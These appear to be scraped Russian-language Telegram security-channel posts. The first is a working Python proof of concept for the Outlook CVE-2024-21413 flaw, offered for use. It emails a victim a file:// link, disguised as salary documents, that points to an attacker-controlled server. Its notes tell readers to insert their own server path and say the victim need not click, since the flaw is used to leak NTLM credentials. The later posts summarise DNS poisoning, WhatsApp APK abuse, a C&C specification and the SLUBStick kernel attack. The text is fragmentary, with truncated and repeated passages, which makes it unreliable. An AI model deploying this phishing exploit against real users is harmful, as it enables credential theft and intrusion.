2024-21413 /outlook RCE
*
POC
Но есть пара НО:
1. В строке 27 вам необходимо указать путь к файлу на вашем сервере (линк на
2. На линк жертве кликать не нужно,
3. Было мнение что нужно находиться в LAN жертвы, но как бы есть пара минут пока
#outглюк #ntlm2
*
POC
import smtplib
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
def send_email():
# Get user input for sender's email address and password
sender_email = input("Enter your Outlook email address: ")
sender_password = input("Enter your Outlook email password: ")
# Get user input for receiver's email address
receiver_email = input("Enter the recipient's email address: ")
# Create a new message object
msg = MIMEMultipart()
# Add sender, receiver, and subject to the message
msg['From'] = sender_email
msg['To'] = receiver_email
msg['Subject'] = input("Enter email subject: ")
# Ask user if they want to add a link attachment
add_attachment = input("Do you want to add a link attachment? (yes/no): ").lower()
if add_attachment == 'yes':
html_content = """\
<!DOCTYPE html>
<html lang="en">
<body>
<p><a href="file:///\\192.168.206.139/test/Doc.txt!xssvideo">Salary docs</a></p>
</body>
</html>"""
msg.attach(MIMEText(html_content, 'html'))
# Connect to SMTP server and send email
with smtplib.SMTP('smtp-mail.outlook.com', 587) as server:
server.starttls()
server.login(sender_email, sender_password)
server.send_message(msg)
print("Email sent successfully.")
if __name__ == "__main__":
send_email()
Но есть пара НО:
1. В строке 27 вам необходимо указать путь к файлу на вашем сервере (линк на
rtf например)2. На линк жертве кликать не нужно,
Office Protected View все сам сделает.3. Было мнение что нужно находиться в LAN жертвы, но как бы есть пара минут пока
port established#outглюк #ntlm2
🔥18👍10
TuDoor
*
Только не королевская династия, я скорее династия
В общем к сути, собралась как то в Окледе (богоспасаемые штаты) группа хитрых азиатов.
Слово за слово, все скатилось к перечитыванию
основной тезис которого как известно гласит, пойди и отрави DNS ближнего своего.
Ну и как водится дочитались до дыр в
*
Рекомендую к осмыслению саму страничку и линки внизу.
Среда чюваки
#DNS #DOS #cachepoison
*
Только не королевская династия, я скорее династия
DNS.В общем к сути, собралась как то в Окледе (богоспасаемые штаты) группа хитрых азиатов.
Слово за слово, все скатилось к перечитыванию
RFC и трудов Дэна Камински (мир праху его), основной тезис которого как известно гласит, пойди и отрави DNS ближнего своего.
Ну и как водится дочитались до дыр в
BIND, PowerDNS и Microsoft DNS и всего сопутствующего.*
Рекомендую к осмыслению саму страничку и линки внизу.
Среда чюваки
#DNS #DOS #cachepoison
👍17🔥3😱3
This media is not supported in your browser
VIEW IN TELEGRAM
WhatsApp extension manipulation
*
Что с телегой, что вацапом, это даже комментировать не хочется, когда юзер сам ставит APK и дает ему разрешения.
Когда там последний zeroClick был, 2 года назад ? )
*
POC
#FU
*
Что с телегой, что вацапом, это даже комментировать не хочется, когда юзер сам ставит APK и дает ему разрешения.
Когда там последний zeroClick был, 2 года назад ? )
*
POC
#FU
👍24🔥8😱5
А вы читали когда либо спецификации на
*
Документ серьезный, даже
*
Open Source C&C Specification
C&C ? 👍*
Документ серьезный, даже
RFC присутствует*
Open Source C&C Specification
👍10🔥4
SLUBStick - атака на кэш ядра linux
*
Суть атаки сводится к перекрестному кэшированию ядра, перетекает из
Затестили на: ядра 5.9 и 6.2 _ x32/x64
Но то ладно, интересно другое, использовались
Но то ладно, защита ядер
*
В конце августа, будет конфа, где обещают всем участникам в гостиничном номере на подушку положат не шоколадку, а POC exploit
*
За то зарелизили сочный хрустящий PDF с жирным тех анализом и возможностью применения
*
Жирный хрустящий slubstick.pdf
#linux #vuln
*
Суть атаки сводится к перекрестному кэшированию ядра, перетекает из
limited heap в возможность произвольного чтения и записи в памяти (а это LPE и escape docker).Затестили на: ядра 5.9 и 6.2 _ x32/x64
Но то ладно, интересно другое, использовались
9 CVE -)Но то ладно, защита ядер
SMEP/SMAP/KASLR - в упор не видят атаки -)*
В конце августа, будет конфа, где обещают всем участникам в гостиничном номере на подушку положат не шоколадку, а POC exploit
*
За то зарелизили сочный хрустящий PDF с жирным тех анализом и возможностью применения
*
Жирный хрустящий slubstick.pdf
#linux #vuln
🔥15👍6